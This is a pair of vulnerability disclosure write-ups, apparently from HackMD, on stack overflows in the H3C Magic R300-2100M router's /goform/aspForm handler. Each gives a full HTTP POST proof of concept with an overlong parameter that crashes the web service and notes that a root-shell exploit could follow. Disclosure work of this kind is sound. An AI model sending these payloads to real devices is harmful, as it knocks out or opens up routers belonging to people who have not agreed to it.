\# H3C Magic R300-2100M was discovered stack overflow via the Edit\_BasicSSID interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the Edit\_BasicSSID interface at /goform/aspForm. ## Vulnerability Details !\[\](https://hackmd.io/\_uploads/Bk4CQusE3.png) In the Edit\_BasicSSID function, local variable v32 is 64 bytes long. !\[\](https://hackmd.io/\_uploads/HkxTRm\_s4h.png) V31 can be controlled by attacker, entered as parameter 'param'. In line 51, v31 is formatted into v32 by function sscanf as long as the size of the data we enter until ';' without filtering or checking length. So when the size of the data we enter before ';' is larger than 64 bytes, it will cause a stack overflow. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://hackmd.io/\_uploads/H1dtUui4h.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 602 CMD=Edit\_BasicSSID&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://hackmd.io/\_uploads/H1Ni8dsV3.png) And you can write your own exp to get the root shell.

CVE-2023-33642: H3C Magic R300-2100M was discovered stack overflow via the Edit_BasicSSID interface at /goform/aspForm - HackMD

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the AddWlanMacList interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the AddWlanMacList interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the AddWlanMacList interface at /goform/aspForm. ## Vulnerability Details !\[\](https://hackmd.io/\_uploads/ry9T-do4n.png) In the AddWlanMacList function, local variable v5 and v6 are both 32 bytes long. !\[\](https://hackmd.io/\_uploads/rkfRZui4n.png) V3 can be controlled by attacker, entered as parameter 'param'. In line 30, v3 is formatted into v5,v6 by function sscanf. So when the size of the data we enter between the first and second ';'(or the second and the third) is larger than 32 bytes, it will cause a stack overflow. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://hackmd.io/\_uploads/rJxnzOj4h.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 608 CMD=AddWlanMacList&param=1111;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://hackmd.io/\_uploads/ryypGuiEn.png) And you can write your own exp to get the root shell.

Tag

#apple